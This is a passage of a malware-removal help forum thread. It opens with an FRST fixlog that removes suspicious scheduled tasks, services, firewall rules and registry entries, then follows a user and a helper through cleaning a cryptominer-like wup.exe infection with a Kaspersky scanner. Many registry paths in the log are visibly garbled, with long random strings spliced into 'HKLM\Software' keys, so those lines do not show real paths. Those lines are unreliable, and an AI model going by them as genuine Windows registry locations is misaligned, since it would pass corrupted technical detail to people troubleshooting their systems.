FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File

EmptyTemp:
End
*****************

Processes closed successfully.
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeanJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7un\\CloudNet" => removed successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{28B0A694-674F-4F77-AE22-288A79215844}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28B0A694-674F-4F77-AE22-288A79215844}" => removed successfully
C:\Windows\System32\Tasks\ScheduledUpdate => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{93DFD860-E586-4829-B68C-290557118ECF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93DFD860-E586-4829-B68C-290557118ECF}" => removed successfully
C:\Windows\System32\Tasks\csrss => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93DFD860-E586-4829-B68C-290557118ECF}" => not found
"C:\Windows\System32\Tasks\csrss" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => not found
HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7gins\@microsoft.com/GENUINE => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\MBAMService => removed successfully
MBAMService => service removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\WinmonFS => removed successfully
WinmonFS => service removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7es\WinmonProcessMonitor => removed successfully
WinmonProcessMonitor => service removed successfully
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE} => moved successfully
"C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw" => not found
"C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie" => not found
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini => moved successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Pending) => removed successfully
HKLM\Software\Classes\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Synced) => removed successfully
HKLM\Software\Classes\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\ MEGA (Syncing) => removed successfully
HKLM\Software\Classes\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeaverlayIdentifiers\00asw => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Pending) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Synced) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{05B38830-F4E9-4329-978B-1DD28605D202} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s MEGA (Syncing) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7SID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ESET Security Shell => removed successfully
HKLM\Software\Classes\CLSID\{B089FE88-FB52-11D3-BDF1-0050DA34150D} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\CLSID\{0229E5E7-09E9-45CF-9228-0228EC7D5F17} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rterFileOpreation => removed successfully
HKLM\Software\Classes\CLSID\{FEB746CA-95C2-485F-B386-C30D4E56D22E} => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ContextMenuHandlers\ESET Security Shell => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCealers\MEGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGiGA (Context menu) => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCealers\igfxcui => removed successfully
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7\ContextMenuHandlers\ESET Security Shell => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9sSVC-In-TCP" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9sSVC-In-TCP-NoScope" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{36E5F241-C08F-46E0-9466-1BC748A813DD}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{72A5A12A-716B-4CFA-BD0C-3A90C219130B}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQRFi3dgfSVKpc1B9idTEuN3cBScszNHP9s Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{63563E85-64C7-44E9-BB6F-8669228E4EF9}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{E3904F86-8649-41ED-8BE1-960F80CE1B03}" => removed successfully
"HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea5jtS38n2tVEGiirewallRules\\{2D08EE70-88F2-4649-8299-B182B79733E6}" => removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5486092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 628941254 B
Edge => 0 B
Chrome => 291645840 B
Firefox => 882470961 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 83158 B
LocalService => 83158 B
NetworkService => 124878 B
Jomko => 123082262 B

RecycleBin => 0 B
EmptyTemp: => 1.8 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 22:55:16 ====

Re: Please check my FRST log

#8 Post by Rudy »

Deleted, the log now looks clean. A note: as a layperson, never run ComboFix without first checking with a non-destructive scanner (e.g. FRST). CF irreversibly deletes some things you might need, further cleanup with a script is necessary, and if you don't know how to put one together, it can even damage the system.

Re: Please check my FRST log

#9 Post by Jomko »

Well, it went fine, but with Firefox running something started up again and the notebook began running at full speed and started to overheat. I looked in Task Manager and there is a file wup.exe running; I put it into Google and it found that it is some kind of virus.
Attachments
wup 800x600.png (352.02 KiB) Viewed 1684 times

Re: Please check my FRST log

#10 Post by Rudy »

OK. Run a full scan with AVPTool: http://www.viry.cz/forum/viewtopic.php?f=29&t=58179 . Download the utility, run it, let it work, and when it finishes, delete everything it finds.

Re: Please check my FRST log

#11 Post by Jomko »

I ran Kaspersky; I couldn't manage to get a log out of it, but it found about 20 infections, wup.exe among them. I had it delete everything and so far it seems to have helped. I've had Firefox on for an hour now and the notebook is running fine.

So thank you very much, and I'm going to contribute to the running of this forum so that this service keeps working as long as possible.

Re: Please check my FRST log

#12 Post by Rudy »

Well, AVPTool is just a free scanner built on the Kaspersky engine. So if you deleted everything, it should be OK.

Re: Please check my FRST log

#13 Post by Jomko »

Well, I used what you advised via the link, but there is now a different FREE version of that software there: Kaspersky Virus Removal Tool

https://www.kaspersky.com/downloads/tha ... ool?form=1

Just for your information

Thanks once again

Re: Please check my FRST log

#14 Post by Rudy »

The information in the link is unfortunately out of date, we know about that, which is why I describe what you should do with it. You're welcome! :)